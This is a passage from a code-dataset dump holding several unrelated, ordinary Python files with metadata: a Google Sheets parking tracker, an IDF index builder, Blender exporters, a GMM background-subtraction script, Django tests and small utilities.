"numpy.zeros", "line_number": 393, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 393, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 394, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 394, "usage_type": "argument"}, {"api_name": "numpy.asarray", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 398, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 398, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 399, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 399, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 400, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 400, "usage_type": "name"}, {"api_name": 
"numpy.sqrt", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 431, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 431, "usage_type": "argument"}, {"api_name": "numpy.sum", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 451, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 480, "usage_type": "call"}, {"api_name": "os.path", "line_number": 480, "usage_type": "attribute"}]} +{"seq_id": "471967973", "text": "import gspread\nimport time\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom datetime import *\n\nscope = []\ncreds = []\n\nsheet = None\nlogSheet = None\nclient = None\n\nDATE_FORMAT_STRING = \"%Y-%m-%d %H:%M:%S EST\"\n\n# Getters\n\ndef isThereParking():\n return (spacesAvailable() > 0)\n\ndef occupiedStatusList():\n # Returns a list of bools that signify which parking spots are occupied\n\n connectSheet() # Refresh the sheet values\n statusList = sheet.col_values(2)[1:] # Get all booleans concerning occupation status\n\n for status in statusList: # Cast all values to boolean for sanity checking\n status = bool(status)\n\n return statusList\n\ndef spacesAvailable():\n occupiedStatuses = occupiedStatusList() # Get CSV from Google Sheets to parse\n\n parkingSpaceCount = 0\n\n for i in range(0, len(occupiedStatuses)):\n if isOccupied(i):\n parkingSpaceCount = parkingSpaceCount + 1\n\n return parkingSpaceCount\n\ndef isOccupied(zeroIndexedSpaceNumber):\n occupiedStatuses = occupiedStatusList() # Get CSV from Google Sheets to parse\n return occupiedStatuses[zeroIndexedSpaceNumber].lower() == \"true\" # Get from list, cast to bool\n\ndef getParkingSpaceCount():\n occupiedStatuses = occupiedStatusList() # get list of booleans from Google Sheets spreadsheet\n return len(occupiedStatuses) # Return the number of booleans in the list.\n\n# Setters\n\ndef setOccupied(zeroIndexedSpaceNumber):\n connectSheet() # Refresh state\n index = 2 + zeroIndexedSpaceNumber\n\n if not isOccupied(zeroIndexedSpaceNumber): # If there is a state change, log it in the log sheet.\n logOccupation()\n\n sheet.update_cell(index, 2, True); # Set the specified space to be occupied\n\ndef setVacant(zeroIndexedSpaceNumber):\n connectSheet() # Refresh state\n index = 2 + zeroIndexedSpaceNumber\n\n if isOccupied(zeroIndexedSpaceNumber): # If there is a state change, log it in the log sheet.\n 
logVacancy()\n\n sheet.update_cell(index, 2, False); # Set the specified space to be unoccupied\n\ndef setParkingSpaceCount(oneIndexedSpaceNumber):\n if (oneIndexedSpaceNumber < 1):\n return\n\n initialIndex = getParkingSpaceCount() # Get number of parking spaces in lot.\n\n # If the index is greater than the list length, then allocate more rows\n # to the table and ID accordingly.\n if oneIndexedSpaceNumber > initialIndex:\n for i in range( (initialIndex + 2),(oneIndexedSpaceNumber + 2) ):\n sheet.update_cell(i, 1, i-2)\n sheet.update_cell(i, 2, False)\n # Otherwise, if lesser, eliminate all items indexed at/after oneIndexedSpaceNumber.\n elif oneIndexedSpaceNumber < initialIndex:\n for i in range( (oneIndexedSpaceNumber + 2),(initialIndex + 2)):\n sheet.update_cell(i, 1, \"\")\n sheet.update_cell(i, 2, \"\")\n\n # If the length is the same as it already is, make no changes.\n\n\n\n#\n# All backend stuff to do with google sheets stuff\n#\n\ndef connectSheet():\n if isUninitialized():\n makeConnection()\n\ndef isUninitialized():\n return (sheet == None)\n\ndef makeConnection():\n # Make the connection to the Google Spreadsheet\n scope = ['https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive']\n creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\n\n global client\n client = gspread.authorize(creds)\n global sheet\n global logSheet\n sheet = client.open('parking-status').get_worksheet(0)\n logSheet = client.open(\"parking-status\").get_worksheet(1)\n\n#\n# DateTime stuff\n#\n\ndef dateTimeFormat(dateTimeValue):\n return dateTimeValue.strftime(DATE_FORMAT_STRING)\n\ndef logVacancy(dateTimeValue = datetime.now()):\n timeListIndex = len(logSheet.col_values(1)) + 1 # Get row to insert time in\n logSheet.update_cell(timeListIndex, 1, dateTimeFormat(dateTimeValue)) # Insert time into list.\n newLogValue = int(logSheet.cell(timeListIndex - 1, 2).value) - 1 # Get new count of people in lot\n logSheet.update_cell(timeListIndex, 2, newLogValue) # Set new count of people in lot to sheet\n\ndef logOccupation(dateTimeValue = datetime.now()):\n columnLength = len(logSheet.col_values(1)[1:]) # Read length of date column\n timeListIndex = columnLength + 2 # Get new index of insertion into log\n newOccupancyCount = 0\n\n if columnLength > 0: # If a previous value exists, our new occupancy is based on the previous value.\n newOccupancyCount = int(logSheet.cell(timeListIndex - 1, 2).value) + 1\n else: # Otherwise, our new occupancy is 1 because we assume that our initial occupancy is 0.\n newOccupancyCount = 1\n\n logSheet.update_cell(timeListIndex, 1, dateTimeFormat(dateTimeValue)) # Set new date in column 1\n logSheet.update_cell(timeListIndex, 2, newOccupancyCount) # Set new occupancy count in column 2\n\n\n# ALL CODE THAT IS RUN FOR CERTAIN IS RUN HERE\n", "sub_path": "util/sheets.py", "file_name": "sheets.py", "file_ext": "py", "file_size_in_byte": 4925, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 107, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 107, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 123, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 129, "usage_type": "call"}]} +{"seq_id": 
"381163747", "text": "import numpy as np\nimport multiprocessing\nimport pickle\nimport pandas as pd\nfrom utils import load_pkl\nfrom cli import get_args\nfrom pathlib import Path\nimport os\nDATA_LEN = 46972\n\n\ndef get_inverted_data(model_dir):\n with open(model_dir / \"inverted-file\", \"r\") as f:\n unigram_idf = {}\n bigram_idf = {}\n doc_datas = [{'doc_len': 0, 'unigram': {}, 'bigram': {}} for _ in range(DATA_LEN)]\n while True:\n head_line = f.readline().strip()\n if head_line == \"\":\n break\n head_line = list(map(int, head_line.split()))\n head_idx = head_line[0]\n print(head_idx, end='\\r')\n if head_line[1] == -1:\n unigram_idf[str(head_idx)] = np.log(DATA_LEN / head_line[2])\n else:\n bigram_idf[str(head_idx) + \" \" + str(head_line[1])] = np.log(DATA_LEN / head_line[2])\n for _ in range(head_line[2]):\n line = f.readline()\n line = list(map(int, line.strip().split()))\n if head_line[1] == -1:\n doc_datas[line[0]]['doc_len'] += line[1]\n doc_datas[line[0]]['unigram'][str(head_idx)] = line[1]\n else:\n doc_datas[line[0]]['bigram'][str(head_line[0]) + \" \" + str(head_line[1])] = line[1]\n return unigram_idf, bigram_idf, doc_datas\n\n\nif __name__ == \"__main__\":\n args = get_args()\n if os.path.exists(\"unigram_idf.pkl\") and os.path.exists(\"bigram_idf.pkl\") and os.path.exists(\"doc_datas.pkl\"):\n pass\n else:\n unigram_idf, bigram_idf, doc_datas = get_inverted_data(args.model_dir)\n with open(\"unigram_idf.pkl\", \"wb\") as f:\n pickle.dump(unigram_idf, f)\n\n with open(\"bigram_idf.pkl\", \"wb\") as f:\n pickle.dump(bigram_idf, f)\n\n with open(\"doc_datas.pkl\", \"wb\") as f:\n pickle.dump(doc_datas, f)\n", "sub_path": "process.py", "file_name": "process.py", "file_ext": "py", "file_size_in_byte": 1909, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.log", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 27, "usage_type": "call"}, {"api_name": "cli.get_args", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 46, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "387631513", "text": "import bpy\nimport os\n\n\ncurrPath = os.path.splitext(bpy.data.filepath)[0]+ \".curves.js\"\nfile = open(currPath, \"w\") \n\nfile.write('var curves = {\\n')\nfor ob in bpy.data.objects.values() : \n if ob.type == 'CURVE' :\n file.write( '\"%s\":\\n' % ob.name)\n for spline in ob.data.splines :\n if len(spline.bezier_points) > 0 :\n file.write(\"[\")\n for bezier_point in spline.bezier_points.values() : \n handle_left = ob.matrix_world * bezier_point.handle_left\n co = ob.matrix_world * bezier_point.co\n handle_right = ob.matrix_world * bezier_point.handle_right\n\n file.write(\"[[%.3f, %.3f, %.3f], \" % (handle_left.x, handle_left.y, handle_left.z ))\n file.write(\"[%.3f, %.3f, %.3f], \" % (co.x, co.y, co.z ))\n file.write(\"[%.3f, %.3f, %.3f]],\\n \" % (handle_right.x, handle_right.y, handle_right.z ))\n\n file.write(\"],\\n\")\nfile.write(\"}\\n\")\nfile.close()", "sub_path": "tools/curve_exports.py", "file_name": "curve_exports.py", "file_ext": "py", "file_size_in_byte": 927, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": 
"14", "api": [{"api_name": "os.path.splitext", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.values", "line_number": 9, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 9, "usage_type": "attribute"}]} +{"seq_id": "618195129", "text": "import numpy as np\nimport cv2 as cv2\nimport glob\nimport time\nimport os\nimport shutil\n\nglobal m_fit_num\n\nclass GMM():\n\n def __init__(self):\n self.GMM_MAX_COMPONT = 5 # 混合高斯数\n self.SIGMA = 30\n self.WEIGHT = 0.05\n self.T = 0.7 # 模型排序判读阀值\n self.alpha = 0.005 # 学习率\n self.eps = pow(10, -10)\n self.channel = 3 # RGB三个通道\n self.m_weight = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # 权重\n self.m_mean = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # 均值\n self.m_sigma = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # 方差\n\n def init_model(self,img):\n row , col , channel = img.shape # 得到图片的长宽高 以及其中的通道数\n global m_fit_num\n for i in range(self.GMM_MAX_COMPONT * self.channel):\n self.m_weight[i] = np.zeros((row,col),dtype=\"float32\") # 每个点有5个高斯模型,总共三个通道\n self.m_mean[i] = np.zeros((row, col), dtype='float32')\n self.m_sigma[i] = np.ones((row, col), dtype='float32')\n self.m_sigma[i] *= self.SIGMA\n m_fit_num = np.zeros((row,col),dtype=\"int32\")\n\n def train_model(self,images):\n row, col, channel = images.shape # 得到图片的长宽高 以及其中的通道数\n B,R,G = cv2.split(images) # 利用cv2提取图像RGB三个通道的图形矩阵\n m_mask = np.zeros((row,col),dtype=np.uint8)\n m_mask[:] = 255\n for i in range(row): # 遍历每一个像素点\n for j in range(col):\n cnt = 0\n for c,img in enumerate((B,G,R)):\n num_fit = 0\n for k in range(c * self.GMM_MAX_COMPONT,c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[k][i][j] != 0: # 权重不等于0\n delta = abs(img[i][j] - self.m_mean[k][i][j])\n if float(delta) < 2.5 * self.m_sigma[k][i][j]: # 在2.5个方差之内 平均数 方差 等参数\n self.m_weight[k][i][j] = (1 - self.alpha) * self.m_weight[k][i][j] + self.alpha * 1\n self.m_mean[k][i][j] = (1 - self.alpha) * self.m_mean[k][i][j] + self.alpha * img[i][j]\n self.m_sigma[k][i][j] = np.sqrt((1 - self.alpha) * self.m_sigma[k][i][j] * self.m_sigma[k][i][j] + self.alpha * (img[i][j] - self.m_mean[k][i][j]) * (img[i][j] - self.m_mean[k][i][j]))\n num_fit += 1\n else:\n self.m_weight[k][i][j] *= (1 - self.alpha)\n\n for p in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT): # 对权重进行降序 根据𝜔/𝜎降序排序 等会进行选择\n for q in range(p + 1, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if (self.m_weight[p][i][j] / self.m_sigma[p][i][j]) <= (self.m_weight[q][i][j] / self.m_sigma[q][i][j]):\n self.m_sigma[p][i][j], self.m_sigma[q][i][j] = self.m_sigma[q][i][j], self.m_sigma[p][i][j]\n self.m_weight[p][i][j], self.m_weight[q][i][j] = self.m_weight[q][i][j], self.m_weight[p][i][j]\n self.m_mean[p][i][j], self.m_mean[q][i][j] = self.m_mean[q][i][j], self.m_mean[p][i][j]\n if num_fit == 0: # 没有匹配到任何一个高斯模型\n if self.m_weight[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT-1][i][j] ==0 :\n for kk in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if (0 == self.m_weight[kk][i][j]): # 重新初始化参数\n self.m_weight[kk][i][j] = self.WEIGHT\n self.m_mean[kk][i][j] = img[i][j]\n self.m_sigma[kk][i][j] = self.SIGMA\n break\n else:\n self.m_weight[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = self.WEIGHT\n self.m_mean[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 
1][i][j] = img[i][j]\n self.m_sigma[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = self.SIGMA\n\n weight_sum = 0 # 每个高斯模型的权重要进行归一化操作\n for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[nn][i][j] != 0:\n weight_sum += self.m_weight[nn][i][j]\n else:\n break\n weight_scale = 1.0 / (weight_sum + self.eps)\n weight_sum = 0\n\n for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[nn][i][j] != 0:\n self.m_weight[nn][i][j] *= weight_scale\n weight_sum += self.m_weight[nn][i][j]\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n if weight_sum > self.T:\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n else:\n break\n if cnt == channel:\n m_mask[i][j] = 0\n\n m_mask = cv2.medianBlur(m_mask, 7)\n\n kernel_d = np.ones((5, 5), np.uint8)\n m_mask = cv2.dilate(m_mask, kernel_d)\n # element = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3)) # 调用库函数开启形态学去噪\n # m_mask = cv2.morphologyEx(m_mask, cv2.MORPH_OPEN, element) # 开运算去噪\n return m_mask\n\n def judge_img(self,imgs):\n row, col, channel = imgs.shape\n B, G, R = cv2.split(imgs)\n m_mask = np.zeros((row, col), dtype=np.uint8)\n m_mask[:] = 255\n for i in range(row):\n for j in range(col):\n cnt = 0\n for c, img in enumerate((B, G, R)): # 一张图片的每个像素点进行判断 是否是作为前景还是背景\n weight_sum = 0\n for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[nn][i][j] != 0:\n weight_sum += self.m_weight[nn][i][j]\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n if weight_sum > self.T:\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n else:\n break\n\n if cnt == channel:\n m_mask[i][j] = 0\n\n m_mask = cv2.medianBlur(m_mask, 7)\n kernel_d = np.ones((5, 5), np.uint8)\n m_mask = cv2.dilate(m_mask, kernel_d)\n return m_mask\n\n\n\n\nif __name__ == '__main__':\n file_list = glob.glob('WavingTrees/b*.bmp') # 读入测试文件得列表\n GMM_Model = GMM()\n GMM_Model.__init__() # 初始化模型\n path = \"GMM_OUTPUT_Primordial\"\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n else:\n os.mkdir(path)\n i = -1\n for file in file_list:\n i += 1\n img = cv2.imread(file)\n if i == 0:\n GMM_Model.init_model(img) # 第一张图片\n if i <= 200: # 前面的200张用于训练模型\n t1 = time.time()\n print(\"第{}次训练\".format(i))\n m_mask = GMM_Model.train_model(img)\n t2 = time.time()\n print(\"花费时间:\",t2 - t1)\n if i == 286: # 训练完毕 开始识别\n print(\"开始背景检测\")\n t1 = time.time()\n j = 0\n for temp_file in file_list:\n temp_img = cv2.imread(temp_file)\n m_mask = GMM_Model.judge_img(temp_img)\n cv2.imwrite(\"GMM_OUTPUT_Primordial/{}.jpg\".format(str(j).zfill(3)), m_mask)\n j += 1\n t2 = time.time()\n print(\"检测花费时间:\",t2 - t1)\n\n\n\n\n\n\n\n", "sub_path": "GMM_Backgroundsubtraction.py", "file_name": "GMM_Backgroundsubtraction.py", "file_ext": "py", "file_size_in_byte": 8867, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", 
"line_number": 37, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 101, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cv2.medianBlur", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 134, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 135, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 147, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 148, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 154, "usage_type": "call"}, {"api_name": "time.time", "line_number": 158, "usage_type": "call"}, {"api_name": "time.time", "line_number": 161, "usage_type": "call"}, {"api_name": "time.time", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 168, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 170, "usage_type": "call"}, {"api_name": "time.time", "line_number": 172, "usage_type": "call"}]} +{"seq_id": "289382679", "text": "__all__ = ['Job']\n\nfrom collections import namedtuple\n\n# Namedtuple which encapsulates a KQ job.\nJob = namedtuple(\n typename='Job',\n field_names=(\n 'id', # Job ID (str)\n 'timestamp', # Unix timestamp indicating when job was enqueued (int)\n 'topic', # Name of the Kafka topic (str)\n 'func', # Function to execute (callable)\n 'args', # Positional arguments (list)\n 'kwargs', # Keyword arguments (dict)\n 'timeout', # Job timeout threshold in seconds (int | float)\n 'key', # Kafka message key if any (str | None)\n 'partition' # Kafka topic partition if any (str | None)\n )\n)\n\n# noinspection PyUnresolvedReferences,PyProtectedMember\nJob.__new__.__defaults__ = (None,) * len(Job._fields)\n", "sub_path": "kq/job.py", "file_name": "job.py", "file_ext": "py", "file_size_in_byte": 796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.namedtuple", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "532628809", "text": "from flaskblog import app, bcrypt, db\nimport json\n\nwith open('./posts.json') as f:\n data = json.load(f)\nprint(type(data))\n\nfor item in data:\n print(item)\n print(type(item))\n# print(data)\n\n# snipp for adding posts\nfor js in data:\n post = Post(title=js['title'], content=js['content'], user_id=js['user_id'])\n db.session.add(post)\n\ndb.session.commit()\n\nimport os\nclear = lambda: os.system('cls')\nclear()\n\n", "sub_path": "db_upload.py", "file_name": "db_upload.py", "file_ext": "py", "file_size_in_byte": 408, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 
"code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "flaskblog.db.session.add", "line_number": 16, "usage_type": "call"}, {"api_name": "flaskblog.db.session", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flaskblog.db", "line_number": 16, "usage_type": "name"}, {"api_name": "flaskblog.db.session.commit", "line_number": 18, "usage_type": "call"}, {"api_name": "flaskblog.db.session", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flaskblog.db", "line_number": 18, "usage_type": "name"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "308417780", "text": "import xlwt\nimport time\n\ndef timeCove(a):\n timeArray = time.strptime(a, \"%Y%m%d\")\n otherStyleTime = time.strftime(\"%Y-%m-%d\",timeArray)\n return otherStyleTime\ndef set_style(name, height, bold=False):\n\n style = xlwt.XFStyle() # 初始化样式\n\n font = xlwt.Font() # 为样式创建字体\n font.name = name # 'Times New Roman'\n font.bold = bold\n font.color_index = 4\n font.height = height\n\n # borders= xlwt.Borders()\n # borders.left= 6\n # borders.right= 6\n # borders.top= 6\n # borders.bottom= 6\n\n style.font = font\n # style.borders = borders\n\n return style\n\n\n# 写excel\ndef write_excel(db,filename):\n f = xlwt.Workbook() # 创建工作簿\n '''\n 创建第一个sheet:\n sheet1\n '''\n sheet1 = f.add_sheet(u'sheet1', cell_overwrite_ok=True) # 创建sheet\n row0 = [u'收费员工号', u'日志日期', u'收入(元)']\n for i in range(0, len(row0)):\n sheet1.write(0, i, row0[i], set_style('Times New Roman', 220, True))\n\n for (i,j) in db.items():\n sheet1.write(i+1, 0, int('017'+str(j[2])), set_style('Times New Roman', 220, True))\n sheet1.write(i+1, 1, timeCove(j[0][0:8]), set_style('Times New Roman', 220, True))\n sheet1.write(i+1, 2, int(j[1])/100, set_style('Times New Roman', 220, True))\n f.save(filename[0:-4] + '.xlsx') # 保存文件\n\n\n", "sub_path": "123/creatXls.py", "file_name": "creatXls.py", "file_ext": "py", "file_size_in_byte": 1355, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.strptime", "line_number": 5, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 6, "usage_type": "call"}, {"api_name": "xlwt.XFStyle", "line_number": 10, "usage_type": "call"}, {"api_name": "xlwt.Font", "line_number": 12, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "198939661", "text": "from datetime import timedelta\nfrom unittest import TestCase\nfrom tasks.models import Task\nfrom django.utils import timezone\n\n\nclass TaskModelTestCase(TestCase):\n\n def test_complete_model_is_complete(self):\n target = Task()\n target.complete_time = timezone.now() - timezone.timedelta(days = 1 )\n\n \n self.assertTrue(target.is_complete)\n\n def test_incomplete_model_is_incomplete(self):\n target = Task()\n target.complete_time = None\n\n self.assertFalse(target.is_complete)\n\n def test_future_complete_model_is_incomplete(self):\n target = Task()\n target.complete_time = timezone.now() + timezone.timedelta(days = 1)\n\n self.assertFalse(target.is_complete)\n\n def test_due_soon_model_is_due_soon(self):\n target = Task() \n target.due_date = timezone.now() + timezone + timedelta(days = 1)\n\n self.assertTrue(target.due_soon)\n\n def test_mot_due_soon_model_is_not_due_soon(self):\n target = Task()\n target.due_date = timezone.now() + timezone.timedelta(days = 3)\n\n self.assertFalse(target.due_soon)\n\n def 
test_no_due_date_model_is_not_due_soon(self):\n target = Task()\n target.due_date = None\n\n self.assertFalse(target.due_soon)\n\n def test_mark_complete_marks_complete(self):\n target = Task()\n target.complete_time = None\n self.assertFalse(target.is_complete)\n\n target.mark_complete()\n\n self.assertTrue(target.is_complete)\n\n def test_mark_incomplete_marks_incomplete(self):\n target = Task()\n\n target.complete_time = timezone.now()\n self.assertTrue(target)\n\n target.mark_incomplete()\n\n self.assertTrue(target.is_complete)\n\n \n\n\n\n\n\n\n\n\n\n\n", "sub_path": "02/demos/todo/tasks/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "tasks.models.Task", "line_number": 10, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 11, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 11, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 11, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 17, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 23, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 24, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 24, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 29, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 30, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 30, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 35, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 36, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 36, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 41, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 47, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 56, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 58, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "37725209", "text": "import bpy\r\nfrom bpy.app.handlers import persistent\r\nfrom bpy.props import EnumProperty\r\n\r\npreview_collection = None\r\n\r\n\r\n@persistent\r\ndef brush_load_handler(none):\r\n global preview_collection\r\n\r\n unregister_and_unload_brushes()\r\n register_and_load_brushes()\r\n\r\n\r\n@persistent\r\ndef brush_update_handler(scene):\r\n global preview_collection\r\n\r\n try:\r\n if bpy.context.window_manager.brush_previews != bpy.context.tool_settings.sculpt.brush.name:\r\n bpy.context.window_manager.brush_previews = bpy.context.tool_settings.sculpt.brush.name\r\n except:\r\n pass\r\n\r\n if preview_collection:\r\n if not (set(brush.name for brush in bpy.data.brushes if brush.use_paint_sculpt) <= set(item[0] for item in preview_collection.items())):\r\n bpy.utils.previews.remove(preview_collection)\r\n add_brushes()\r\n 
